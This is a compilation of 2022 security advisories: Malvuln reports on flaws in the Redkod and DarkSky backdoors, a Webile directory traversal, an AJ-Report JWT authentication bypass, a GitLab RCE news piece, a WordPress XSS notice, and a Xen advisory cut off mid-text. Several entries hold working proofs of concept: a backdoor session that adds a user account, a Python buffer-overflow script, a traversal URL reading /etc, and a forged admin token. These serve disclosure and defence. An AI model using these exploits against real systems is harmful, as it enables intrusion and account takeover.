Backdoor.Win32.Redkod.d malware suffers from a hardcoded credential vulnerability.

Discovery / credits: Malvuln (John Page aka hyp3rlinx) (c) 2022  
Original source: https://malvuln.com/advisory/bb309bdd071d5733efefe940a89fcbe8.txt  
Contact: malvuln13@gmail.com  
Media: twitter.com/malvuln

Threat: Backdoor.Win32.Redkod.d  
Vulnerability: Weak Hardcoded Credentials   
Description: The malware listens on TCP port 4820. Authentication is required, however the password "redkod" is weak and hardcoded in cleartext within the PE file.  
Family: Redkod  
Type: PE32  
MD5: bb309bdd071d5733efefe940a89fcbe8  
Vuln ID: MVID-2022-0649  
Disclosure: 10/16/2022

Exploit/PoC:  
C:\>nc64.exe x.x.x.x 4820  
===========================================================  
=                   RedKod Backdoor 1.0                   =  
=                        By R-e-D                         =  
=                  http://www.redkod.com                  =  
=                     r-e-d@redkod.com                    =  
===========================================================

Password: redkod

RBackdoor# exec calc  
msg: Execution effectuee avec succes

RBackdoor# setpass malvuln

RBackdoor# help  
COMMAND HELP:

 > Shell Commands :

CD          Permet de changer de repertoire courant  
CLEAR       Efface le buffer de la console  
COPY        Permet de copier un fichier  
DEL         Permet d'effacer un ou plusieurs fichier  
DIR         Permet de lister le contenu d'un repertoire  
FIND        Recherche un fichier a travers le path  
HELP        Affiche cette aide  
LS          Permet de lister le contenu d'un repertoire  
MD          Permet de creer un repertoire  
MOVE        Permet de deplacer un fichier ou un repertoire  
REN         Permet de renommer un fichier  
PWD         Permet de recuperer le repertoire courant  
RMDIR       Permet d'effacer un repertoire  
SHELL       Permet d'executer toute commande DOS sur le systeme cible

 > Informations Commands :

CLIP        Permet de recuperer le contenu du presse papier  
DISKINFO    Permet de recuperer des informations sur les disques durs  
GETGROUPS   Permet de recuperer des informations sur les groupes, les users, les            SID :)  
GETPROCESS  Recupere et affiche la liste des processus actifs  
GETSERVICES Permet d'afficher les services NT presents sur une machine local ou             distante  
LISTEVENT   Permet de lister les journaux du eventlog  
NETSHARE    Permer d'afficher les ressources partager de la machine local ou d'u            ne machine distante  
ENUMSERVER  Permet d'afficher les servers appartenant au domaine  
SYSINFO     Permet de recuperer des informations sur le systeme cible  
TIME        Affiche l'heure et la date du systeme distant  
UPTIME      Permet d'afficher depuis combien de temps le systeme fonctionne  
USERINFO    Permet d'obtenir des informations sur un utilisateur  
VERSION     Affiche la version de RBackdoor  
WHOAMI      Permet de recuperer l'utilisateur logge sur la machine

 > Interactions Commands :

ADDEVENT    Permet d'ajouter un evenement dans l'eventlog  
ADDSHARE    Permet d'ajouter une ressource partagee  
BEEP        Fait beeper le haut parleur interne  
CLEARLOG    Permet d'effacer un journal complet de l'eventlog  
DELSERVICE  Permet de supprimer un service present  
DELSHARE    Permet de retirer une ressource partagee  
EXEC        Permet d'executer une commande sur le systeme cible  
HEXEC       Permet d'executer une commande tout en cachant sa sortie  
LOGOFF      Permet de fermer la session de l'utilisateur courant  
KILLPROCESS Permet de killer un processus  
MOUSE       Permet de placer le curseur de la souris au coordonnees x et y                  voulues  
MSGBOX      Permet d'envoyer une boite de dialogue au systeme cible avec message            personalise  
RCHAT       Permet d'etablir une communication ecrite avec une personne etant pr            esent sur le pc distant  
REBOOT      Permet de redemarrer la machine  
SCREENSHOT  Permet de prendre un screenshot du bureau de la machine distante  
SENDKEY     Permet d'emuler la pression d'une touche du clavier  
SETNAME     Change le nom NetBios du serveur  
STARTSERVICE Permet de demarrer un servive present sur la machine serveur  
STOPSERVICE Permet de stopper un service present et demarrer

 > Administration of RBackdoor Commands :

EXIT        Permet de fermer la connection a la backdoor tout en laissant                   la backdoor active  
KILL        Permet de desactiver ou de reactiver la backdoor  
OPEN        Creer un nouveau processus de RBackdoor sur un autre port  
SETPASS     Permet de modifier le pass associe a la backdoor

 > RBackdoor Tools :

FGET        Permet de recuperer un fichier sur un serveur FTP  
FPUT        Permet d'uploader un fichier sur un serveur FTP  
MAIL        Permet d'envoyer un mail, etc...  
NETPATCH    Rootkit permettant de patcher netstat.exe pour cacher RBackdoor  
RCRYPT      Permet de crypter ou de decrypter un fichier  
RPATCH      Permet de patcher le systeme pour effacer rbackdoor  
RSHELL      Permet de lancer un vrai shell DOS  
SCAN        Permet de scanner les ports d'une hote distante  
TELNET      Permet de se connecter a une hote distante (TCP Protocol Only)  
VIEW        Permet de lire le contenu d'un fichier  
WGET        Recupere et d'affiche le contenu d'un fichier heberge sur un serveur            http  
WRITE       Permet d'ecrire directement dans un fichier

msg: Tapez help <command> pour des informations plus precises sur la commande voulue

RBackdoor# rshell  
                                 ATTENTION!!  
Pour fermer le shell veuillez tapez 'exit'! Sinon perte de la backdoor envisageable !

Microsoft Windows [Version 10.0.16299.309]  
(c) 2017 Microsoft Corporation. All rights reserved.

C:\dump>whoami  
whoami  
desktop-2c4jqho\victim

C:\dump>net user hyp3rlinx 666 /add  
net user hyp3rlinx 666 /add  
The command completed successfully.

Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).

Backdoor.Win32.Redkod.d MVID-2022-0649 Hardcoded Credential

Webile version 1.0.1 suffers from a directory traversal vulnerability.

    Document Title:===============Webile v1.0.1 - Directory Traversal Web VulnerabilityReferences (Source):====================https://www.vulnerability-lab.com/get_content.php?id=2320Release Date:=============2022-10-10Vulnerability Laboratory ID (VL-ID):====================================2320Common Vulnerability Scoring System:====================================7.3Vulnerability Class:====================Directory- or Path-TraversalCurrent Estimated Price:========================1.000€ - 2.000€Product & Service Introduction:===============================Webile, is a local area network cross-platform file management tool based on http protocol. Using the personal mobile phone as a server inthe local area network, browsing mobile phone files, uploading files, downloading files, playing videos, browsing pictures, transmitting data,statistics files, displaying performance, etc. No need to connect to the Internet, you can browse files, send data, play videos and otherfunctions through WiFi LAN or mobile phone hotspot, and no additional data traffic will be generated during data transmission. Support Mac,Windows, Linux, iOS, Android and other multi-platform operating systems.(Copy of the Homepage:https://play.google.com/store/apps/details?id=com.wifile.webile&hl=en&gl=US  )Abstract Advisory Information:==============================The vulnerability laboratory core research team discovered a directory traversal web vulnerability in the Webile v1.0.1 Wifi mobile web application.Affected Product(s):====================Product Owner: WebileProduct: Webile v1.0.1 - (Framework) (Mobile Web-Application)Vulnerability Disclosure Timeline:==================================2022-02-06: Researcher Notification & Coordination (Security Researcher)2022-02-07: Vendor Notification (Security Department)2022-**-**: Vendor Response/Feedback (Security Department)2022-**-**: Vendor Fix/Patch (Service Developer Team)2022-**-**: Security Acknowledgements (Security Department)2022-10-10: Public Disclosure (Vulnerability Laboratory)Discovery Status:=================PublishedExploitation Technique:=======================RemoteSeverity Level:===============HighAuthentication Type:====================Open Authentication (Anonymous Privileges)User Interaction:=================No User InteractionDisclosure Type:================Independent Security ResearchTechnical Details & Description:================================A directory traversal web vulnerability has been discovered  in the Webile v1.0.1 wifi mobile web application.The vulnerability allows remote attackers to change the application path in performed requests to compromise thelocal application or file-system of a mobile device. Attackers are for example able to request environmentvariables or a sensitive system path.The directory-traversal web vulnerability is located in the insecure web-server configuration. The path of the local user is notsecure restricted and validated. Thus allows an unauthenticated user with wifi access to request local web-server files withoutsecure permission. The bug itself is located in the filepath parameter of the change_upload_dir function.Exploitation of the directory traversal web vulnerability requires no privileged web-application user account or user interaction.Successful exploitation of the vulnerability results in information leaking by unauthorized file access and mobile application compromise.Proof of Concept (PoC):=======================The directory traversal web vulnerability can be exploited by remote attackers without user account or user interaction.For security demonstration or to reproduce the web vulnerability follow the provided information and steps below to continue.PoC: Exploitationhttp://localhost:8080/webile_select_dir?t=change_upload_dir&filepath=../../../../../../../../../../../../etc/--- PoC Session Logs ---http://localhost:8080/webile_select_dir?t=change_upload_dir&filepath=../../../../../../../../../../../../etc/Host: localhost:8080User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: de,en-US;q=0.7,en;q=0.3Accept-Encoding: gzip, deflateConnection: keep-aliveCookie: treeview=0; sessionId=b21814d80862de9a06b7086cc737dae6Upgrade-Insecure-Requests: 1-GET: HTTP/1.1 200 OKContent-Type: text/html; charset=UTF-8Connection: keep-aliveContent-Encoding: gzipTransfer-Encoding: chunked--- FS Session Logs ---Output:File name   bluetoothbpfcarriercompatconfiginitpermissionspppseccomp_policysecurityselinuxsensorssysconfigtextclassifierthemevintfepdgipmSecurity Risk:==============The security risk of the directory traversal web vulnerability in the mobile web application is estimated as high.Credits & Authors:==================Vulnerability-Lab [Research Team] -https://www.vulnerability-lab.com/show.php?user=Vulnerability-LabDisclaimer & Information:=========================The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties,either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Labor its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profitsor special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states donot allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data.Domains:   https://www.vulnerability-lab.com  ;  https://www.vuln-lab.com  ;https://www.vulnerability-db.comAny modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory.Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of othermedia, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and otherinformation on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list, modify, use oredit our material contact (admin@ or research@) to get a ask permission.            Copyright © 2022 | Vulnerability Laboratory - [Evolution Security GmbH]™-- VULNERABILITY LABORATORY (VULNERABILITY LAB)RESEARCH, BUG BOUNTY & RESPONSIBLE DISCLOSURE

Webile 1.0.1 Directory Traversal

Backdoor.Win32.DarkSky.23 malware suffers from a buffer overflow vulnerability.

Discovery / credits: Malvuln (John Page aka hyp3rlinx) (c) 2022  
Original source: https://malvuln.com/advisory/1164ef21ef2af97e0339359c0dce5e7d.txt  
Contact: malvuln13@gmail.com  
Media: twitter.com/malvuln

Threat: Backdoor.Win32.DarkSky.23  
Vulnerability: Remote Stack Buffer Overflow (SEH)  
Description: The malware listens on TCP port 5418. Third-party adversaries who can reach the server can send a specially crafted payload triggering a stack buffer overflow overwriting EDX register and Structured Exception Handler (SEH). In order to see the typical exploit pattern of "\x41" "AAAA" we need to actually send "\x50" as there is an loop that performs an XOR converting our payload. Therefore, if we send "AAAAAAAA" we will get "PPPPPPPP", the malware performs the XOR with the value of 11.  
Family: DarkSky  
Type: PE32  
MD5: 1164ef21ef2af97e0339359c0dce5e7d  
Vuln ID: MVID-2022-0648  
Dropped files: SysArchive.exe, KNREL32.exe, notepade.exe  
ASLR: False  
DEP: False  
CFG: False  
Safe SEH: False  
Disclosure: 10/15/2022

Example:

0040134A | 80 34 31 11              | xor byte ptr ds:[ecx+esi],11            | ;XOR converting the payload happens here.  
0040134E | 41                       | inc ecx                                 |  
0040134F | 3B C8                    | cmp ecx,eax                             |  
00401351 | 7C F7                    | jl sysarchive.40134A                    |  
00401353 | 5E                       | pop esi                                 |  
00401354 | C3                       | ret                                     |

Python test...

>>> 0x41 ^ 0x11  
80  
>>> hex(80)  
'0x50'  
>>> chr(0x50)  
'P'

GET /AAAAA will then become all "P" ...

0019D24C  56 54 45 31 3E 50 50 50 50 50 41 41 41 41 41 41  VTE1>PPPPPAAAAAA    
0019D25C  41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA    
0019D26C  41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA    
0019D27C  41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA    
0019D28C  41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA  

So to get our \x41 pattern we need to supply \x50, the malware will XOR it with 0x11 giving us \x41.

>>> 0x50 ^ 0x11  
65  
>>> hex(65)  
'0x41'  
>>> chr(65)  
'A'

EAX : 7EFEFEFE  
EBX : 02902A58  
ECX : 0019F4B0  
EDX : 41414141  
EBP : 0019D230  
ESP : 0019D214  
ESI : 0019D777  
EDI : 0019FF81  
EIP : 7451561B     msvcrt.7451561B

Finally we see our desired exploit payload converted from \x50 'P' to \x41 or "A" 

0019D240  08 DF 8E 02 08 DF 8E 02 01 00 00 00 56 54 45 31  .ß...ß......VTE1    
0019D250  3E 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41  >AAAAAAAAAAAAAAA    
0019D260  41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA    
0019D270  41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA    
0019D280  41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 50  AAAAAAAAAAAAAAAP    
0019D290  50 50 50 50 50 50 50 50 50 50 50 50 50 50 50 50  PPPPPPPPPPPPPPPP    
0019D2A0  50 50 50 50 50 50 50 50 50 50 50 50 50 50 50 50  PPPPPPPPPPPPPPPP

Memory Dump:  
(2798.242c): Stack buffer overflow - code c0000409 (first/second chance not available)  
eax=00000000 ebx=00000000 ecx=0019f52c edx=41414141 esi=00000000 edi=00000002  
eip=7770ed3c esp=0019cb60 ebp=0019cba0 iopl=0         nv up ei pl nz ac pe nc  
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000216  
ntdll!ZwWaitForMultipleObjects+0xc:  
7770ed3c c21400          ret     14h

0:000> .ecxr  
eax=7efefefe ebx=02552c88 ecx=0019f52c edx=41414141 esi=0019d777 edi=0019fffd  
eip=74515619 esp=0019d214 ebp=0019d230 iopl=0         nv up ei pl zr na pe nc  
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010246  
msvcrt!strcat+0x89:  
74515619 8917            mov     dword ptr [edi],edx  ds:002b:0019fffd=41000000  
*** WARNING: Unable to verify checksum for SysArchive.exe  
*** ERROR: Module load completed but symbols could not be loaded for SysArchive.exe

0:000> !analyze -v  
*******************************************************************************  
*                                                                             *  
*                        Exception Analysis                                   *  
*                                                                             *  
*******************************************************************************

Failed calling InternetOpenUrl, GLE=12029

FAULTING_IP:   
msvcrt!strcat+89  
74515619 8917            mov     dword ptr [edi],edx

EXCEPTION_RECORD:  0019cd64 -- (.exr 0x19cd64)  
ExceptionAddress: 74515619 (msvcrt!strcat+0x00000089)  
   ExceptionCode: c0000005 (Access violation)  
  ExceptionFlags: 00000008  
NumberParameters: 2  
   Parameter[0]: 00000001  
   Parameter[1]: 001a0000  
Attempt to write to address 001a0000

PROCESS_NAME:  SysArchive.exe

ERROR_CODE: (NTSTATUS) 0xc0000409 - The system detected an overrun of a stack-based buffer in this application. This overrun could potentially allow a malicious user to gain control of this application.

EXCEPTION_CODE: (NTSTATUS) 0xc0000409 - The system detected an overrun of a stack-based buffer in this application. This overrun could potentially allow a malicious user to gain control of this application.

EXCEPTION_PARAMETER1:  00000015

MOD_LIST: <ANALYSIS/>

NTGLOBALFLAG:  70

APPLICATION_VERIFIER_FLAGS:  0

CHKIMG_EXTENSION: !chkimg -lo 50 -d !msvcrt  
    74515590 - msvcrt!strcat  
  [ 8b:cc ]  
    74515617 - msvcrt!strcat+87 (+0x87)  
  [ eb:cc ]  
2 errors : !msvcrt (74515590-74515617)

CONTEXT:  0019cdb4 -- (.cxr 0x19cdb4)  
eax=7efefefe ebx=02552c88 ecx=0019f52c edx=41414141 esi=0019d777 edi=0019fffd  
eip=74515619 esp=0019d214 ebp=0019d230 iopl=0         nv up ei pl zr na pe nc  
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010246  
msvcrt!strcat+0x89:  
74515619 8917            mov     dword ptr [edi],edx  ds:002b:0019fffd=41000000  
Resetting default scope

WRITE_ADDRESS:  001a0000 

FOLLOWUP_IP:   
msvcrt!strcat+89  
74515619 8917            mov     dword ptr [edi],edx

FAULTING_THREAD:  0000242c

BUGCHECK_STR:  APPLICATION_FAULT_MEMORY_CORRUPTION_STACK_BUFFER_OVERRUN_MISSING_GSFRAME_LARGE_EXPLOITABLE_FILL_PATTERN_41414141

PRIMARY_PROBLEM_CLASS:  MEMORY_CORRUPTION_LARGE_EXPLOITABLE_FILL_PATTERN_41414141

DEFAULT_BUCKET_ID:  MEMORY_CORRUPTION_LARGE_EXPLOITABLE_FILL_PATTERN_41414141

LAST_CONTROL_TRANSFER:  from 00404ed7 to 74515619

STACK_TEXT:    
0019d214 00404ed7 0019e24c 0019d777 0019d238 msvcrt!strcat+0x89  
WARNING: Stack unwind information not available. Following frames may be wrong.  
0019d230 00402394 00004128 0019e24c 04ed39f8 SysArchive+0x4ed7  
0019f9e8 41414141 41414141 41414141 41414141 SysArchive+0x2394  
0019f9ec 41414141 41414141 41414141 41414141 0x41414141  
0019f9f0 41414141 41414141 41414141 41414141 0x41414141  
0019f9f4 41414141 41414141 41414141 41414141 0x41414141  
0019f9f8 41414141 41414141 41414141 41414141 0x41414141  
0019f9fc 41414141 41414141 41414141 41414141 0x41414141  
0019fa00 41414141 41414141 41414141 41414141 0x41414141  
0019fa04 41414141 41414141 41414141 41414141 0x41414141  
0019fa08 41414141 41414141 41414141 41414141 0x41414141  
0019fa0c 41414141 41414141 41414141 41414141 0x41414141  
0019fa10 41414141 41414141 41414141 41414141 0x41414141  
0019fa14 41414141 41414141 41414141 41414141 0x41414141  
0019fa18 41414141 41414141 41414141 41414141 0x41414141  
0019fa1c 41414141 41414141 41414141 41414141 0x41414141  
0019fa20 41414141 41414141 41414141 41414141 0x41414141  
0019fa24 41414141 41414141 41414141 41414141 0x41414141  
0019fa28 41414141 41414141 41414141 41414141 0x41414141  
0019fa2c 41414141 41414141 41414141 41414141 0x41414141  
0019fa30 41414141 41414141 41414141 41414141 0x41414141  
...

SYMBOL_NAME:  memory_corruption!msvcrt

FOLLOWUP_NAME:  MachineOwner

MODULE_NAME: memory_corruption

IMAGE_NAME:  memory_corruption

DEBUG_FLR_IMAGE_TIMESTAMP:  0

STACK_COMMAND:  dt ntdll!LdrpLastDllInitializer BaseDllName ; dt ntdll!LdrpFailureData ; .cxr 0x19cdb4 ; kb

FAILURE_BUCKET_ID:  MEMORY_CORRUPTION_LARGE_EXPLOITABLE_FILL_PATTERN_41414141_c0000409_memory_corruption!msvcrt

BUCKET_ID:  APPLICATION_FAULT_MEMORY_CORRUPTION_STACK_BUFFER_OVERRUN_MISSING_GSFRAME_LARGE_EXPLOITABLE_FILL_PATTERN_41414141_MISSING_GSFRAME_memory_corruption!msvcrt

0:000> !exchain  
0019cc18: ntdll!_except_handler4+0 (77716a50)  
  CRT scope  0, func:   ntdll!RtlReportExceptionHelper+251 (777557ad)  
0019f9dc: 41414141  
Invalid exception stack at 41414141

Exploit/PoC:  
from socket import *

MALWARE_HOST="x.x.x.x"  
PORT=5418

def doit():  
    s=socket(AF_INET, SOCK_STREAM)  
    s.connect((MALWARE_HOST, PORT))

    JUNK="GET /"+"\x50"*1300+"HTTP/1.1\r\nHost:29"+"\x50"*10000  
    PAYLOAD=JUNK+"\r\n\r\n"

    s.send(PAYLOAD)  
    s.close()  
    print("Backdoor DarkSky.23 Exploit By malvuln")

if __name__=="__main__":  
    doit()

Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).

Backdoor.Win32.DarkSky.23 MVID-2022-0648 Buffer Overflow

anji-plus AJ-Report 0.9.8.6 allows remote attackers to bypass login authentication by spoofing JWT Tokens.

这是英文的漏洞报告，中文的在(This is the English report, the Chinese report is in): 身份验证绕过漏洞

**Description**

The program uses a fixed JWT key, and the stored Redis key uses username format characters. Any user who has logged in within an hour. JWT Token can be forged with his username to bypass authentication

Login API

_com.anjiplus.template.gaea.business.modules.accessuser.controller.AccessUserController#login_

Make redis key of format username, Although uuid is used, uuid is not involved in authentication.

_com.anjiplus.template.gaea.business.modules.accessuser.service.impl.AccessUserServiceImpl#login_

_com.anjiplus.template.gaea.business.constant.BusinessConstant#GAEA\_SECURITY\_LOGIN\_TOKEN_

Uses a fixed JWT secret key

_spring-boot-gaea-2.0.5.RELEASE.jar!com.anji.plus.gaea.utils.JwtBean#createToken_

_spring-boot-gaea-2.0.5.RELEASE.jar!com.anji.plus.gaea.GaeaProperties.Security#getJwtSecret_

TokenFilter for authentication

_com.anjiplus.template.gaea.business.filter.TokenFilter#doFilter_

Forge different users' Tokens by modifying the username field

    {
        "type": 0,
        "uuid": "",
        "tenant": "tenantCode",
        "username": "admin"
    }
    

    eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ0eXBlIjowLCJ1dWlkIjoiIiwidGVuYW50IjoidGVuYW50Q29kZSIsInVzZXJuYW1lIjoiYWRtaW4ifQ.ce3xqqUypEinA_ZCSky9AptKjkG8qFm8ESMuCunqe6Y

CVE-2022-42983: Authentication Bypass vulnerability · Issue #I5VVZ0 · anji-plus/AJ-Report - Gitee.com

Data importation mechanism failed to sanitize imports

Ben Dickson 13 October 2022 at 14:27 UTC

Data importation mechanism failed to sanitize imports

A vulnerability in GitLab allowed attackers to stage various attacks against GitLab servers, including the cloud-hosted GitLab.com platform.

The bug, reported by security researcher ‘yvvdwf’, was caused by the way GitLab imports data from GitHub, which could be exploited to run commands on the host server.

**Unsafe imports**

GitLab uses Octokit, a library that provides an interface to import data from the GitHub API. To retrieve and present its results, Octokit uses the HTTP client library Sawyer.

However, GitLab directly used the Sawyer results returned by Octokit without sanitizing them, which provided opportunities to insert malicious commands.

Yvvdwf found that one of the parameters used in the import function was prone to command injections against GitLab’s Redis database.

**RCE, information theft, and more**

On standalone GitLab installations, an attacker could exploit the command injection bug to escalate from Redis to Bash and send commands to the operating system. Any potential attacker would have remote code execution (RCE) access to the host with the privileges of the host process.

While the RCE exploit did not work on GitLab.com, yvvdwf was able to use other Redis commands to replicate data from GitLab.com to a standalone server with a public IP. They were also able to poison GitLab projects through the same mechanism and make them inaccessible.

An attacker with a standalone GitLab installation and an API access token could use the exploit to steal information, inject malicious code, and perform other malicious actions against GitLab.com.

**Protecting GitLab servers**

The vulnerability was assigned CVE-2022-2884 with a critical base score of 9.9 in the Common Vulnerability Scoring System.

GitLab has already patched the issue in GitLab.com and published a critical security release for GitLab Community Edition and Enterprise Edition.

All users are advised to upgrade their GitLab installation. For organizations that can’t upgrade right away, GitLab advises them to secure their installation by disabling imports until they can patch their system.

While GitLab users will be safe by using the cloud or updated self-hosted version of the platform, other services that use Octakit to interact with GitHub should be wary and make sure that they perform the right checks around the data they pass on and receive through the library.

RELATED Policy-as-code approach counters ‘cloud native’ security risks

GitLab patches RCE bug in GitHub import function

Authenticated (admin+) Reflected Cross-Site Scripting (XSS) vulnerability in Gabe Livan's Asset CleanUp: Page Speed Booster plugin <= 1.3.8.4 at WordPress.

CVE-2021-36899: Asset CleanUp: Page Speed Booster

Arm: unbounded memory consumption for 2nd-level page tables Certain actions require e.g. removing pages from a guest's P2M (Physical-to-Machine) mapping. When large pages are in use to map guest pages in the 2nd-stage page tables, such a removal operation may incur a memory allocation (to replace a large mapping with individual smaller ones). These memory allocations are taken from the global memory pool. A malicious guest might be able to cause the global memory pool to be exhausted by manipulating its own P2M mappings.

\-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256 Xen Security Advisory CVE-2022-33747 / XSA-409 version 3 Arm: unbounded memory consumption for 2nd-level page tables UPDATES IN VERSION 3 ==================== Public release. ISSUE DESCRIPTION ================= Certain actions require e.g. removing pages from a guest's P2M (Physical-to-Machine) mapping. When large pages are in use to map guest pages in the 2nd-stage page tables, such a removal operation may incur a memory allocation (to replace a large mapping with individual smaller ones). These memory allocations are taken from the global memory pool. A malicious guest might be able to cause the global memory pool to be exhausted by manipulating its own P2M mappings. IMPACT ====== A malicious guest could cause a Denial of Service, preventing any system operation requiring further allocation of Xen memory, including creating new guests. NB however that memory exhaustion by itself shouldn’t cause either Xen or properly-written guests to crash. VULNERABLE SYSTEMS ================== All versions of Xen are affected. Only Arm systems are vulnerable. x86 systems are not vulnerable. MITIGATION ========== There is no known mitigation. RESOLUTION ========== Applying the appropriate set of attached patches resolves this issue. Note that patches for released versions are generally prepared to apply to the stable branches, and may not apply cleanly to the most recent release tarball. Downstreams are encouraged to update to the tip of the stable branch before applying these patches. Note further that the patches for this XSA depend on the patches for XSA-410. xsa409/\*.patch xen-unstable xsa409-4.16/\*.patch Xen 4.16.x xsa409-4.15/\*.patch Xen 4.15.x xsa409-4.14/\*.patch Xen 4.14.x xsa409-4.13/\*.patch Xen 4.13.x $ sha256sum xsa409\* xsa409\*/\* a211afb31199a8edf189928f5285b6a58ce35aac991ae3f708b07274ad5f1082 xsa409.meta 96cc260fbf3c2bedd17d61080ba536791f1116cd7dcc6a172dbcccc452e66974 xsa409-4.13/0001-libxl-docs-Use-arch-specific-default-paging-memory.patch f94376d12757312175e19b6c51c56bcb3e21055f729440eb9112bee9fc44cd65 xsa409-4.13/0002-xen-arm-Construct-the-P2M-pages-pool-for-guests.patch b52ca6538a0525dc1638391ee032a7aedced31cc3bcdc8efea02d975813fa251 xsa409-4.13/0003-xen-arm-libxl-Implement-XEN\_DOMCTL\_shadow\_op-for-Arm.patch 5a59740c398804950ce99102ae2741d5d539313e4a24d0727926d2b4965f148e xsa409-4.13/0004-xen-arm-Allocate-and-free-P2M-pages-from-the-P2M-poo.patch b7c3438a4c6a4957b0e9b911419638c8719550c91db4587660a6d498a73747ae xsa409-4.14/0001-libxl-docs-Use-arch-specific-default-paging-memory.patch 5a01d80c7157feeeb3374c221d306bd98a134a99597ebfdeee5d62df47e60f27 xsa409-4.14/0002-xen-arm-Construct-the-P2M-pages-pool-for-guests.patch d9b4385c1d55f9c758a108368ef5fbfc86ab2ff532314f88245cc1fce4f95ea2 xsa409-4.14/0003-xen-arm-libxl-Implement-XEN\_DOMCTL\_shadow\_op-for-Arm.patch 96456aea63d6471888b5364330e69c15ffd2ed055200cd286fb59cab379c3905 xsa409-4.14/0004-xen-arm-Allocate-and-free-P2M-pages-from-the-P2M-poo.patch 4c31fd8b3f346e6e9834c33e61037d122b802a83dceec168ed5e699566ca01e2 xsa409-4.15/0001-libxl-docs-Use-arch-specific-default-paging-memory.patch 4b9b1ba9c5c7a644268500906b628664ea0630777653f86e62faf85d9e004b8c xsa409-4.15/0002-xen-arm-Construct-the-P2M-pages-pool-for-guests.patch 04a097e055e7faf9163e1e7105bfb3a78782fa6e9c3025597725a198d85d9887 xsa409-4.15/0003-xen-arm-libxl-Implement-XEN\_DOMCTL\_shadow\_op-for-Arm.patch 9b59622a9c00d75fe3f57b20d286e91df3589855d55e0bad83c64145002c3bc7 xsa409-4.15/0004-xen-arm-Allocate-and-free-P2M-pages-from-the-P2M-poo.patch 2ce57902cff4ad61432b61bf8a10dcc699b88b6b9a02c6e7c51c720b276ec39d xsa409-4.16/0001-libxl-docs-Use-arch-specific-default-paging-memory.patch 18ad838d9c4a6da8890d5d6b3165000e21d8db022bc743989dfda6cc43a7686c xsa409-4.16/0002-xen-arm-Construct-the-P2M-pages-pool-for-guests.patch 201bf6c15d0380f4588a12f33bff90f05fe3c8da75dcb0801063216bedcc00c7 xsa409-4.16/0003-xen-arm-libxl-Implement-XEN\_DOMCTL\_shadow\_op-for-Arm.patch f8cea9b75636e73ffffb88b18d80f60ab9ca47856232f1cff787d5d0a1742106 xsa409-4.16/0004-xen-arm-Allocate-and-free-P2M-pages-from-the-P2M-poo.patch 62be1c9896e1a0563abbe515bd50e117147a274b3bae0ce062d1e86cdd535b61 xsa409/0001-libxl-docs-Add-per-arch-extra-default-paging-memory.patch 6bcd3cdd9eb998f5714b1c44d3cf1aaa3b1f3615ef8ccb530cf804638b18c9e3 xsa409/0002-xen-arm-Construct-the-P2M-pages-pool-for-guests.patch b4740035de11fc0b4b7bcb281b288b1972ef3b97649ff3e61072384aeddf864b xsa409/0003-xen-arm-libxl-Implement-XEN\_DOMCTL\_shadow\_op-for-Arm.patch ac7af4fea2fa84384fd65308ee8cb50470515a96d2160e467867c8bb766b580a xsa409/0004-xen-arm-Allocate-and-free-P2M-pages-from-the-P2M-poo.patch $ DEPLOYMENT DURING EMBARGO ========================= Deployment of the patches and/or mitigations described above (or others which are substantially similar) is permitted during the embargo, even on public-facing systems with untrusted guest users and administrators. But: Distribution of updated software is prohibited (except to other members of the predisclosure list). Predisclosure list members who wish to deploy significantly different patches and/or mitigations, please contact the Xen Project Security Team. (Note: this during-embargo deployment notice is retained in post-embargo publicly released Xen Project advisories, even though it is then no longer applicable. This is to enable the community to have oversight of the Xen Project Security Team's decisionmaking.) For more information about permissible uses of embargoed information, consult the Xen Project community's 